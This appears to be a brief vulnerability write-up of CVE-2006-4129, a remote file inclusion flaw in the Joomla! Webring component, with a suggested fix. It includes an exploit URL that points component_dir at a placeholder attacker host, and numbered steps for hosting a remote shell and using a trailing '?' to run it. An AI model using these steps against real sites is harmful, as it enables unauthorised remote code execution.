CVE-2006-4129

An attacker can supply a URL in the `component_dir` HTTP GET parameter to `admin.webring.docs.php`. Because the parameter is passed directly to `require_once` without validation, PHP will include and execute the remote file specified by the attacker [ref_id=1]. The exploit URL pattern is `http://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?` [ref_id=1]. No authentication is required, and the attacker only needs network access to the Joomla! instance.

The vulnerable file is `admin.webring.docs.php` in the Webring Component (com_webring) for Joomla!. On line 12, the code calls `require_once ($component_dir. "mungdocs.class.php")`, using the `$component_dir` parameter directly without sanitization [ref_id=1].

No patch is provided in the bundle. The advisory does not specify a fix, but the remediation for this class of vulnerability is to validate that `$component_dir` is a local path (e.g., by checking it against an allowlist of known component directories or by using a hardcoded base path) rather than accepting an arbitrary URL. The underlying issue is that user-supplied input flows directly into a `require_once` statement without sanitization [ref_id=1].

1. Host a malicious PHP script (e.g., a remote shell) at a URL such as `http://evil_scripts/shell.txt?`. 2. Send a request to the target: `http://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?` [ref_id=1]. 3. The trailing `?` ensures the appended `mungdocs.class.php` string is treated as a query parameter rather than a file path, allowing the remote script to execute.